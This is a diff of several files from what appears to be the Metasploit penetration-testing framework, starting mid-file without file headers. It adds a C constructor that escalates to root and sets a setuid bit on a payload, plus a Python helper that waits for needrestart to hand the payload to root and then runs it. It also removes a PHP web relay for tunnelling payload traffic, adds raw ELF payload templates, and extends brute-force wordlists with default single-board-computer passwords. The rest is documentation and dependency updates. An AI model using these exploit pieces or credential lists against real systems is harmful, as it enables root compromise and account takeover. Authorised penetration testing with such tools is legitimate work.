+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -0,0 +1,98 @@
+; build with:
+;   nasm elf_dll_riscv32le_template.s -f bin -o template_riscv32le_linux_dll.bin
+
+BITS 32
+
+org     0
+
+ehdr:
+  db    0x7f, "ELF", 1, 1, 1, 0    ; e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0
+  dw    3                          ; e_type    = ET_DYN
+  dw    0xF3                       ; e_machine = EM_RISCV
+  dd    1                          ; e_version = EV_CURRENT
+  dd    _start                     ; e_entry   = _start
+  dd    phdr - $$                  ; e_phoff
+  dd    shdr - $$                  ; e_shoff
+  dd    0                          ; e_flags
+  dw    ehdrsize                   ; e_ehsize
+  dw    phdrsize                   ; e_phentsize
+  dw    2                          ; e_phnum
+  dw    shentsize                  ; e_shentsize
+  dw    2                          ; e_shnum
+  dw    1                          ; e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:
+  dd    1                          ; p_type       = PT_LOAD
+  dd    0                          ; p_offset
+  dd    $$                         ; p_vaddr
+  dd    $$                         ; p_paddr
+  dd    0xDEADBEEF                 ; p_filesz
+  dd    0xDEADBEEF                 ; p_memsz
+  dd    7                          ; p_flags      = rwx
+  dd    0x1000                     ; p_align
+
+phdrsize equ  $ - phdr
+
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dd    dynsection                 ; p_offset
+  dd    dynsection                 ; p_vaddr
+  dd    dynsection                 ; p_vaddr
+  dd    dynsz                      ; p_filesz
+  dd    dynsz                      ; p_memsz
+  dd    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dd    0                          ; sh_flags
+  dd    dynsection                 ; sh_addr
+  dd    dynsection                 ; sh_offset
+  dd    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    8                          ; sh_addralign
+  dd    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dd    0                          ; sh_flags
+  dd    strtab                     ; sh_addr
+  dd    strtab                     ; sh_offset
+  dd    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    0                          ; sh_addralign
+  dd    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dd    0x0c
+  dd    _start
+; DT_STRTAB
+  dd    0x05
+  dd    strtab
+; DT_SYMTAB
+  dd    0x06
+  dd    strtab
+; DT_STRSZ
+  dd    0x0a
+  dd    0
+; DT_SYMENT
+  dd    0x0b
+  dd    0
+; DT_NULL
+  dd    0x00
+  dd    0
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+global _start
+_start:
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_riscv64le_template.s -f bin -o template_riscv64le_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv32le_template.s -f bin -o template_riscv32le_linux.bin
+
+BITS 32
+
+org     0x00010000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv64le_template.s -f bin -o template_riscv64le_linux.bin
+
+BITS 64
+
+org     0x00400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_x64_template.s -f bin -o template_x64_linux.bin
+
+BITS 64
+
+org 0x0000000000400000
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x3e                     ;   e_machine
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf64_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0x4141414141414141       ;   p_filesz
+  dq    0x4242424242424242       ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1454,6 +1454,7 @@ bewan
 beyonce
 bhaby
 bhebhe
+bianbu
 bianca
 bier
 bigboy
@@ -3061,6 +3062,7 @@ lucas
 lucenttech1
 lucenttech2
 lucero
+luckfox
 lucky
 lucky1
 lucky7
@@ -3248,6 +3250,7 @@ mikel
 mikey
 milagros
 milkshake
+milkv
 miller
 millie
 mine
@@ -3477,6 +3480,7 @@ operator
 oqksad
 oracle
 orange
+orangepi
 orlando
 orpheus
 oscar
@@ -4192,6 +4196,7 @@ stacey
 stanley
 star
 starfish
+starfive
 stargate
 stark123
 starl
@@ -7290,6 +7290,7 @@ bi
 bi-level
 bia
 bialystok
+bianbu
 bianca
 bianco
 bianka
@@ -44356,6 +44357,7 @@ limy
 lin
 lina
 linage
+linaro
 linc
 linchpin
 lincoln
@@ -45397,6 +45399,7 @@ lucita
 lucite
 lucius
 luck
+luckfox
 luckhoff
 luckier
 luckily
@@ -49040,6 +49043,7 @@ milkshark
 milksop
 milkweed
 milkwoodpark
+milkv
 milky
 mill
 millaa
@@ -55429,6 +55433,7 @@ orang-utan
 orang-utans
 orange
 orangeade
+orangepi
 orangery
 oranges
 orangey
@@ -63171,6 +63176,7 @@ radium
 radius
 radix
 radon
+radxa
 rae
 raeann
 raedene
@@ -74326,6 +74332,7 @@ stardust
 stare
 starer
 starfish
+starfive
 starfruit
 stargate
 stargaze
@@ -77837,6 +77844,7 @@ temporizer
 temporizing
 temporizingly
 temporizings
+temppwd
 tempt
 temptation
 tempted
@@ -1007,3 +1007,15 @@ arcsight
 MargaretThatcheris110%SEXY
 karaf
 vagrant
+1234
+milkv
+luckfox
+orangepi
+temppwd
+bianbu
+debian
+starfive
+linaro
+rock
+radxa
+ubuntu
@@ -28,6 +28,7 @@ cups-pk-helper
 daemon
 dbadmin
 dbus
+debian
 Debian-exim
 Debian-snmp
 demo
@@ -65,6 +66,7 @@ landscape
 libstoragemgmt
 libuuid
 lightdm
+linaro
 list
 listen
 lp
@@ -95,6 +97,7 @@ operator
 oracle
 OutOfBox
 pi
+pico
 polkitd
 pollinate
 popr
@@ -104,9 +107,12 @@ postmaster
 printer
 proxy
 pulse
+radxa
 redsocks
 rfindd
+riscv
 rje
+rock
 root
 ROOT
 rooty
@@ -143,6 +149,7 @@ systemd-timesync
 tcpdump
 trouble
 tss
+ubuntu
 udadmin
 ultra
 umountfs
@@ -1,66 +1,71 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
-wp-automatic
-wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
-wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
+plainview-activity-monitor
+post-smtp
+really-simple-ssl
+reflex-gallery
 royal-elementor-addons
-backup-backup
-hash-form
-give
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+suretriggers
+ultimate-member
+user-registration
+user-registration-pro
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
+wp-automatic
+wpdiscuz
+wp-easycart
 wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
+wp-mobile-edition
+wps-hide-login
+wpshop
+wp-symposium
+wp-time-capsule
+wptouch
+wp-ultimate-csv-importer
+wysija-newsletters
@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
+ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -314,6 +314,7 @@ ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
    t.datetime "created_at", precision: nil, null: false
    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
+    t.jsonb "metadata", default: {}, null: false
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_pkcs12", unique: true, where: "((type)::text = 'Metasploit::Credential::Pkcs12'::text)"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT (((type)::text = 'Metasploit::Credential::SSHKey'::text) OR ((type)::text = 'Metasploit::Credential::Pkcs12'::text)))"
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.5)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.1)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,46 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.6)
-      strscan
-    rouge (4.0.0)
+    rexml (3.4.1)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -103,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
-   2.2.22
+   2.5.10
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -10,28 +10,38 @@ Updates are released about once every other week for Windows and Linux.

 The pgp signatures below can be verified with the following [public key](https://pgp.mit.edu/pks/lookup?op=get&search=0xCDFB5FA52007B954)

-|Download Link|File Type|SHA1|PGP|
-|-|-|-|-|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
-| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
-| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
-| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
-| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
-| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)|
